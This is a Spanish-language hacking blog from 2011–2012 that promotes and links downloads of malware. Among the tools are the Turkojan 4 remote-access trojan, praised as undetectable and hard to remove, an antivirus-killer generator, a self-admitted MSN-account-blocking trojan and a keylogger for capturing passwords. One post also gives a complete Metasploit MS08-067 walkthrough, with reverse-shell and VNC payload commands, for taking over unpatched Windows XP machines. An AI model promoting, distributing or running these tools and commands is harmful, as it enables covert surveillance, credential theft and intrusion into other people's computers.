martes, 19 de junio de 2012

Turkojan 4


Ayer salio la version 4 del troyano turco, troyano que se caracteriza por su gran cantidad de herramientas y sus funciones FUN.
Por ahora es indetectable y tiene la opcion de cambiarle el lenguaje a español y a otros idiomas mas.

Lo nuevo:
  • Remote Desktop feature added.You can view remote screen and control it via your keyboard and mouse.
  • Now you can record video from remote webcam.
  • Audio streaming feature added.
  • Now you don't need to download images from remote computer,you can view them with thumbnail manager.
  • You can get MSN logs with MSN Sniffer.
  • You can block harmful web-pages on remote computer.
  • You can manage remote computer with ms-dos commands.(Remote Shell)
  • New functions added for server secrecy
  • -Now it is harder to delete server
  • -Server can't be show in registry,searching files,msconfig,etc.
  • -Server can't be shown in ctrl+alt+del menu[Vista/Xp/95/98/ME].
  • -Server prevents system restoring.It deletes all system restore points.
  • Server size is %60 smaller now.
  • Connection bug fixed
  • Now server can't be dedectd by any anti-virus software,
  • but i think it will be dedected soon.
  • Some changes were made in Client appearance
  • Now advanced keylogger can capture clipboard changements.
  • You can install any file to remote computer from internet via Remote Downloader.
  • Now you can get more information about remote computer.
  • You can learn installed softwares on remote computer.
  • Help mode added.So you can create visible servers.


Imagenes:







En español:



Editado:
Cuando lo ejecutan al cliente modifica su pagina de inicio por la pagina principal del troyano del Internet Explorer 6.
Si nesecitan saber como sacarla dejen un comentario asi les respondo.

Descarga:
Turkojan 4 (Descarga directa Tuchost)
Turkojan 4 (pagina oficial)
Turkojan 4 (mirror rapidshare)

Contraseña: http://troyanosyvirus.com.ar

lunes, 18 de junio de 2012

Iceberg Generator Tool V.Beta

Iceberg Generator Tool es un Killer de programas de seguridad creado por Sanko y Slore.
Esta diseñada para deshabilitar los programas de proteccion mas conocidos y evitar que se actualizen o ejecuten.






Caracteristicas:

- Melt (Elimina el archivo al ejecutarlo)
- Persistencia en autoinicio
- Mata algúnos softwares de protección.
- Oculta procesos en el administrador de tareas
- Apagado el pc al tratar de borrar el archivo
- Encriptable

Instalar dependencia
El programa utiliza una dependencia, si al intentar abrirlo les da un error deben instalarla.
Para instalarla deben abrir el archivo "Register.exe" ubicado en la carpeta "Codejock" de la descarga, luego le dan click en "Register". Eso es todo, ahora deberia abrir bien el programa.

Modo de uso
Su uso es muy simple solo seleccionan el programa que desean deshabilitar y se generara un archivo en la carpeta donde se encuentra el Iceberg Generator, ese archivo (killer) es el que matara el proceso.
Pueden generar uno o varios Killers o todos en un solo archivo.

Video:








Esta es una version beta y como es de suponer tiene algunas fallas, pero funciona muy bien con la mayoria de los antivirus.

¡ADVERTENCIA: NO EJECUTAR EN SUS PCS LOS ARCHIVOS QUE GENERA. USAR SOLO EN PCS DE PRUEBA!

Descarga: 


Iceberg Generator Tool V.Beta - (Descarga directa Tuchost.com)

Contraseña del rar: troyanosyvirus.com.ar

sábado, 28 de abril de 2012

Accediendo a Windows XP desde BackTrack 5 utilizando Metasploit

En este tutorial explicare como acceder a una PC con Windows XP (sin sus actualizaciones de seguridad) utilizando Metasploit en BackTrack 5 y el famoso exploit Netapi.
La idea de este tutorial es que sepan lo vulnerable que es un sistema sin descargar las actualizaciones.

Requisitos para este tutorial:
- La PC a la que vamos a acceder debe tener Windows XP, SP1, SP2 o SP3, Windows 2000 o 2003. Y no debe tener los parches de seguridad. Tambien recomendaria desactivar firewalls y antivirus para evitar problemas.
- Para simplificar el tutorial supondremos que la PC a atacar esta en la misma red que la PC Atacante. El exploit tambien funciona con PCs que no esten en la misma red, solo que hay que tener en cuenta otras variables, como el router y el firewall, que no se tendran en cuenta en este tutorial.
- Usare como SO atacante BackTrack 5 que ya viene con todas las herramientas, pueden descargar la iso desde la pagina oficial -->http://www.backtrack-linux.org/downloads/
Despues que descargaron la iso la guardan en un CD/DVD y arrancan el Sistema operativo desde el CD/DVD, o si no pueden usar una maquina virtual como vmware, o virtual box y arrancar el sistema operativo desde la iso. No detallare esto ya que hay mucha informacion en internet decomo iniciar Backtrack 5 desde un CD.

Comenzamos...

1- Comenzamos obteniendo nuestra ip local para saber donde estamos ubicados en la red. Para ello ya dentro de BackTrack Abrimos una Terminal (Ctrl+Alt+T) y escribimos:

ifconfig







Como podemos ver nuestra IP local es 10.0.0.3, podria ser otra del tipo 192.168.X.X o de otro tipo. Apuntamos esta direccion porque nos servira mas adelante.

2- Escaneamos la red con nmap para obtener la direccion IP de los posibles objetivos. Como nuestra IP local es 10.0.0.3, buscaremos objetivos entre el rango 10.0.0.1 y 10.0.0.30, para ello escribimos lo siguiente

nmap -sS -O [Rango de IP]

Ejemplo: nmap -sS -O 10.0.0.1-30
Ejemplo2: nmap -sS -O 192.168.1.1-255








Como podemos ver tenemos una PC con Linux (que no es vulnerable al ataque) y otra con Windows XP, 2000 o 2003 que posiblemente es vulnerable al ataque. Y su IP es 10.0.0.4Apuntaremos esta IP para usarla despues.
Si ya tenemos la IP del objetivo no es necesario hacer este paso asi que simplemente lo saltean.

3- Ya sabemos nuestra IP y la IP del objetivo asi que ahora procederemos al ataque.
Abrimos Metasploit escribiendo en la terminal:

msfconsole






Nos saldra algo asi:






4- Sleccionaremos el exploit Netapi escribiendo lo siguiente:

use exploit/windows/smb/ms08_067_netapi

5- Seteamos como objetivo a la IP de la PC con windows XP:

set RHOST [IP Objetivo]

Ejemplo: set RHOST 10.0.0.4

6- Ahora cargaremos el Payload. En este tutorial mostrare 2 tipos de Payload diferentes, "windows/shell/reverse_tcp" y"windows/vncinject/reverse_tcp"

"windows/shell/reverse_tcp" es una shell remota, se usa cuando se necesita discrecion. El usuario de la PC objetivo no notara que estamos controlando su PC.

Cargamos escribiendo lo siguiente:

set PAYLOAD windows/shell/reverse_tcp

7- Seteamos con nuestra IP local:

set LHOST [IP Local]

Ejemplo: set LHOST 10.0.0.3





8- Enviamos el exploit:

exploit


Y listo! Acceso concedido, ya tenemos una shell remota de la PC con windows XP! Con esta shell tenemos acceso total.

Ahora como otra alternativa usaremos el Payload de VNC"windows/vncinject/reverse_tcp", este Payload permite ver el escritorio remoto. No es nada discreto.

Ahora podemos seguir a partir del punto 5, o seguir desde el punto 8. Es lo mismo.

9- Presionamos (Ctrl+C) para cerrar la conexion de la shell.

10- Cargamos el Payload escribiendo:

set PAYLOAD windows/vncinject/reverse_tcp

11- Seteamos con nuestra IP local:

set LHOST [IP local]
Ejemplo: set LHOST 10.0.0.3

12- Enviamos el exploit escribiendo:

exploit






Y listo ya tenemos acceso remoto a la PC con windows XP mediante VNC!

Resumen de los comandos utilizados:

Tomando como ejemplo las siguientes IPs:
IP de nuestra pc (BackTrack): 10.0.0.3
IP de la PC objetivo (Windows XP): 10.0.0.4
msfconsole
ifconfig
nmap -sS -O 10.0.0.1-255
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.0.0.4
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.3
exploit


Como pueden ver son muy pocos los comandos utilizados, por lo que a una persona con conocimientos basicos de Metasploit se le hace muy facil acceder a una PC con windows XP sin los parches de seguridad.

Se recomienda actualizar windows XP para evitar este tipo de ataques.

Links de interes:
Video de youtube: Exploiting windows xp with BackTrack 5 using metasploit
Curso de Metasploit Unleashed en Español


Descarga:




jueves, 11 de agosto de 2011

Nueva Moderadora

Bueno chicos os queremos presentar a una moderadora nueva para nuestro Blogger esto se va haciendo grande cada vez mas es una chica de 15 años se llama Yuli la podeis encontrar en Boombang.tv como Yulyferrer si teneis algun problema podeis acudir a ella es simpatica agradecida... asi que os ayudara encantada hay os dejamos su ficha.


Bienvenida!!

Congelador de MSN

Bueno nos avisaron de que el congelador de msn estaba roto y decidimos subir uno nuevo y aki lo tienen esperemos que lo disfruten y no jueguen con el ya que algunas veces puede aver fallos ect... no nos hacemos responsables del uso de este programa por los usuarios.


Descargar Click acá

Algunas veces el programa es detectado como troyano por algunos antivirus ya que el programa ensi es un troyano que manda a hotmail para bloquear la cuenta de MSN asi que no se austen ni nada esta web es 100% Libre de virus.

Nos Unimos a Anonymous Spain

Bueno dejamos atras boombang.tv para dar un paso mas alante ya que en boombang.tv no nos veiamos con mucho futuro a partir de aora solo llevaremos cosas al dia como programas ect... toda la publicidad de Boombang sera suprimida por el team y no volvera a haber puclicidad en la web sobre ese Chat and Play Online asi que eso es todo lo dejamos para unirnos alos anonymous


martes, 9 de agosto de 2011

Ya Puedes Hackear MSN

En nuestro apartado de hackear msn HACKEAR MSN CON TROYANO BIFROST hay te enseñamos a hackear con videos y muy muy bien explicado totalmente gratis esto es una simple cosa de las nuevas novedades que bienen asi que ya sabeis pasar esta pagina por vuestro pad en boombang.tv  ''Culturehack.tk'' y asi subiremos mas cosas queremos llegar alas 40.000 visitas si queremos podemos!!


>> Si teneis Dudas contactarme en Danubius BB ESP


ATT: Team Culturehack.tk

lunes, 8 de agosto de 2011

Manual Anti-Hack

Hacking Etico es un libro de seguridad informática escrito por el argentino Carlos Tori que cuenta con 328 páginas redactadas con un lenguaje simple y ordenado.
El libro abarca una gran variedad de temas muy bien explicados y desarrollados: Ingeniería Social, Fuerza Bruta, Inyección de código SQL, Seguridad en Servidores Windows y Linux y muchos temas más.

 Anteriormente "Hacking etico" era comercial y se agotaron las ventas en Argentina por lo que su escritor lo decidio liberar.

Contenido:
Capítulo 1: Hacking Ético
Capítulo 2: Recabar información
Capítulo 3: Ingeniería Social
Capitulo 4: Fuerza Bruta
Capitulo 5: Aplicación Web
Capitulo 6: Inyección de código SQL
Capitulo 7: Servidores Windows
Capitulo 8: Servidores Linux
Capitulo 9: Algunos conceptos finales

Muy recomendado para quien se quiere iniciar en el tema.

Pack de 35 Autoclickers

Este Pack biene con 35 autoclickers diferentes todos subidos desde mi pc Danubius todos diferentes no son muy buenos o eso creo :) los fui recopilando desde hace tiempo y aora los subo todos juntos espero que los disfruten y ya pueden descargarlos.

Descargar Click aca 

Revealer Keylogger free

Revealer Keylooger es un simple keylogger que te permite controlar y grabar todas las teclas que se introducen en una PC. Textos como páginas web, conversaciones e incluso usuarios y contraseñas.



Cada uno de los registros está clasificado e identificado con su fecha de creación, el proceso o aplicación en la que se ha introducido el texto, un título descriptivo y el texto en sí.

Esta version tiene un modo invisible, pero NO soporta el envio remoto de logs. Si quieren algo remoto gratuito usen Advanced Logger v.1.

De muy facil uso, recomendado para principiantes.

Descargar:

Descargar Click acá